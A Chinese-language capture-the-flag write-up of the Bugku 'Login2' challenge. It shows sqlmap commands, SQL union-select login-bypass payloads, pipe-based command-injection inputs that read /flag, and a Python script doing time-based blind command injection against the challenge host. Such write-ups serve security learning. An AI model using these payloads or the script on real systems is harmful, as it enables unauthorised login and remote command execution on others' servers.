bugku上Login2

1: 打开环境,是一个页面登陆界面,不能注册,破?union select绕过,

(有的师傅先sqlmap,发现啥啊也没有;python sqlmap.py -r sql.txt --level 5 --batch
–batch //选项不询问,全部按照默认,发现有注入点,然后爆它数据库--dbs,表--table,爆列名,得到id,username和password,在爆字段,发现是空的

2:那就打开bp,火狐(这里推荐)就不用去设置进行设置代理了

3:先在登录界面随便输入一些东西, admin,123,再进行抓包, 也可以用浏览器抓包,里面找到这个tip(还是人性的,没有难度)

tip: JHNxbD0iU0VMRUNUIHVzZXJuYW1lLHBhc3N3b3JkIEZST00gYWRtaW4gV0hFUkUgdXNlcm5hbWU9JyIuJHVzZXJuYW1lLiInIjsKaWYgKCFlbXB0eSgkcm93KSAmJiAkcm93WydwYXNzd29yZCddPT09bWQ1KCRwYXNzd29yZCkpewp9

 base64解码得

 审计一下:想要登录成功,可以 通过输入不存在用户,用union select 构造出指定密码的md5值这样

payload为username=admin' union select 1,md5(123)#&password=123   , 或者是这样的>Venus的md5值=0bdc508a17811a3a860d32749ad44e4b

username=Venus'union select 1,'0bdc508a17811a3a860d32749ad44e4b'#&password=Venus

(密码的md5值要等与你填的密码,我这里是123)

 4:图上就是绕过登录页面了,显示登陆成功,放包后就得到如图页面了

 我随便输了一些,ls, flag, 123|ls, Venus&ls, Venus;ls发现有些没有回显,会不会可能是过滤?

查了查,有可能是命令被过滤了,也有可能是命令执行了但输出过滤了

 他们做到这里用到脚本了,我整不出他们做出来的结果

5:利用管道符绕过,采用写入文件二次返回的方法查看结果

想了想,看看有没有flag的目录

在检测框输入123| cat /flag > test, 检测、然后直接查看test目录下的东西。得到flag{}

**##&&其实这个题我看很多人都是用到脚本了

 我跑了不过我是这样的:`ls`:css index.php login.php test。一样的我建议管道符做,被坑的经验

 也可能我哪里弄错了导致出不来他们说的那个fLag_~~~.txt,(index.php,login.php去掉)有的话就直接环境地址url/fLag_~~~.txt

就能成功访问到flag了

import requests

url = 'http://114.67.246.176:16619/index.php'
s = requests.session()
allString = '''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''

database = ''
flag = 1
comm = input('输入指令:')
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',
           'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
           'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
           'Referer': 'http://114.67.246.176:16619/index.php',
           }
cookies = dict(PHPSESSID='o6fnka50kbj2mh9u5k27paijd6')
for i in range(0, 100):  # 根据自身需要改长度,如果空格连续出现四次以上,就说明后续没内容了
    for j in allString:
        if j == "^":
            j = " "
            data = {'c': "123;a=`" + comm + "`;b=' ';if [ ${a:" + str(i) + ":1} == $b ];then sleep 4;fi"}
        else:
            data = {'c': "123;a=`" + comm + "`;b=\'" + str(j) + "\';if [ ${a:" + str(i) + ":1} == $b ];then sleep 4;fi"}
        r = requests.post(url, data=data, headers=headers, cookies=cookies)
        t = r.elapsed.total_seconds()
        # print(r.text)
        print(database + j + ' 的时间'+ ' 是 ' + str(t))
        if t >= 3:
            database = database + j
            print(str(i) + ' 为 ' + j)
            break
        elif t < 3 and j == 'M':
            flag = 0
            break
    if flag == 0:
        break
print('', database)

  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值